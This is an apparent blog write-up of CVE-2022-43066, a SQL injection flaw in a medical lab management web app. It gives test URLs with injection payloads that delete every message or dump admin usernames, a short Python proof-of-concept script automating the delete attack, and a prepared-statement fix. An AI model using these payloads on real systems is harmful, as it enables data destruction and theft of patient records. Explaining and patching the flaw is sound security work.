---
Overview
In late 2022, a critical vulnerability was discovered in the Online Diagnostic Lab Management System v1. (ODLMS), a web app used by medical labs to manage patient records, test bookings, and reports. The flaw, recorded as CVE-2022-43066, allows attackers to perform SQL injection through the id parameter in the endpoint /odlms/classes/Master.php?f=delete_message. Using this vulnerability, an attacker could manipulate the backend database, gain sensitive data, or even hijack the system.
Let's break down what this vulnerability is, why it matters, and how it can be exploited—with practical code examples, simple explanations, and links to official advisory sources.
What Is CVE-2022-43066?
CVE-2022-43066 is a SQL injection vulnerability. This happens when user inputs in a web application are directly inserted into SQL queries without proper validation/sanitization, letting an attacker interfere with the backend database. In ODLMS v1., the flaw sits in the way the app processes the id parameter in message deletion requests.
Vulnerable URL
/odlms/classes/Master.php?f=delete_message&id=123
By tricking the app with crafted values instead of plain numbers for id, an attacker can run their own SQL commands.
Why Is This Dangerous?
- Data Theft: Attackers can download or modify all patient records, including names, medical details, and more.
Here's a typical (simplified) vulnerable PHP code snippet that demonstrates the problem
<?php
// This code is for explanation - actual code may differ
if (isset($_GET['id'])) {
$id = $_GET['id'];
$sql = "DELETE FROM messages WHERE id = $id";
$result = mysqli_query($conn, $sql);
}
?>
Notice how $id goes *directly* into the SQL statement. If an attacker supplies id=1 OR 1=1, the query becomes:
DELETE FROM messages WHERE id = 1 OR 1=1
This would delete all messages because 1=1 is always true.
1. Testing for Vulnerability
Using a tool like Burp Suite or even just a web browser, an attacker can test the following URL:
http://example.com/odlms/classes/Master.php?f=delete_message&id=1 OR 1=1
If all messages are deleted (or a SQL error shows up), the app is likely vulnerable.
2. Extracting Data
Attackers can leverage the SQL injection to dump sensitive data by union-based injection or error-based injection, depending on database responses.
Attempting the following payload to view admin usernames (assuming there are 2 columns)
http://example.com/odlms/classes/Master.php?f=delete_message&id=1 UNION SELECT 1,username FROM admins--
If the page shows usernames or weird output, you've confirmed injection.
To wipe the entire messages table
http://example.com/odlms/classes/Master.php?f=delete_message&id= OR 1=1
This would trigger
DELETE FROM messages WHERE id = OR 1=1
Result: All records in the messages table are deleted.
Simple Proof-of-Concept (PoC) Code
Here's a Python script using requests to automate the attack:
import requests
url = "http://example.com/odlms/classes/Master.php";
params = {
"f": "delete_message",
"id": "1 OR 1=1" # SQL Injection payload
}
response = requests.get(url, params=params)
if response.status_code == 200:
print("Check if all messages are deleted (SQLi succeeded).")
else:
print("Request failed.")
Responsible Disclosure and Protection
The vulnerability was responsibly reported and is logged at NVD - CVE-2022-43066 and the exploit database.
Securing the PHP snippet
$id = $_GET['id'];
$stmt = $conn->prepare("DELETE FROM messages WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
References
- NVD Entry for CVE-2022-43066
- Exploit-DB 51118
- Sourcecodester Project Page
Final Thoughts
Even simple web apps in sensitive industries can have critical bugs like CVE-2022-43066. Healthcare providers using open-source management platforms must prioritize regular security audits, keep their software patched, and use secure coding practices. If you manage any PHP/MySQL platforms, make sure you're not trusting any user input directly—or you might be the next entry in the CVE list.
Timeline
Published on: 11/02/2022 20:15:00 UTC
Last modified on: 11/03/2022 03:35:00 UTC